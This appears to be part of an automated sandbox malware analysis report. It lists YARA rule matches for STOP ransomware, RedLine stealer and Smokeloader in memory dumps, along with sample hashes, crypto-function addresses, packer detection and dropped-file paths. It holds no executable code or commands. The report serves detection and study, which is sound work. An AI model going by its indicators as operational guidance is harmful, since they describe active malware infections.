Source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.537288789.000000000070B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.615454520.00000000005A0000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000A.00000000.535019814.0000000000728000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.405852892.0000000000758000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000000.532065497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: ECFD.exe PID: 5920, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Detected VMProtect packer
Source: 2A57.exe.1.dr Static PE information: .vmp0 and .vmp1 section names
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\3804.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 812 -s 520
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004022E9 0_2_004022E9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004184DE 0_2_004184DE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A101 0_2_0041A101
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418A22 0_2_00418A22
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004132DB 0_2_004132DB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409BD0 0_2_00409BD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00413B84 0_2_00413B84
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E390 0_2_0040E390
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00413F90 0_2_00413F90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00417F9A 0_2_00417F9A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004137B0 0_2_004137B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143B0 0_2_004143B0
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_004184DE 4_2_004184DE
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_0041A101 4_2_0041A101
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_00418A22 4_2_00418A22
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_004132DB 4_2_004132DB
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_00409BD0 4_2_00409BD0
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_00413B84 4_2_00413B84
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_0040E390 4_2_0040E390
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_00413F90 4_2_00413F90
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_00417F9A 4_2_00417F9A
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_004137B0 4_2_004137B0
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_004143B0 4_2_004143B0
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_004184DE 6_2_004184DE
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_0041A101 6_2_0041A101
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_00418A22 6_2_00418A22
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_004132DB 6_2_004132DB
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_00409BD0 6_2_00409BD0
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_00413B84 6_2_00413B84
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_0040E390 6_2_0040E390
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_00413F90 6_2_00413F90
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_00417F9A 6_2_00417F9A
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_004137B0 6_2_004137B0
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_004143B0 6_2_004143B0
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\2A57.exe A8756585EF0E2E4E7479606E49A56E52C871C24B65C356B6B38F29CBAE300ECC
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 9.0.ECFD.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.ECFD.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.ECFD.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.ECFD.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.ECFD.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.ECFD.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.ECFD.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.ECFD.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.ECFD.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.ECFD.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.ECFD.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.ECFD.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.ECFD.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.ECFD.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.ECFD.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.ECFD.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.ECFD.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.2.ECFD.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.ECFD.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.ECFD.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.ECFD.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.ECFD.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.ECFD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.2.ECFD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.ECFD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000004.00000002.624566316.0000000000738000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000A.00000000.533159957.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.522204411.00000000007C8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000000.529399844.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000D.00000000.499608553.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000000.531541187.000000000070B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.597495979.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.405539182.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.519638464.0000000000781000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000A.00000002.601332950.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.405651754.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000000.536317423.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000A.00000000.526425573.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000A.00000000.528795065.0000000000728000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.516365720.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000A.00000002.608132947.0000000000728000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.514667473.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.406487208.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.597582689.000000000070B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000000.537288789.000000000070B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.615454520.00000000005A0000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000A.00000000.535019814.0000000000728000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
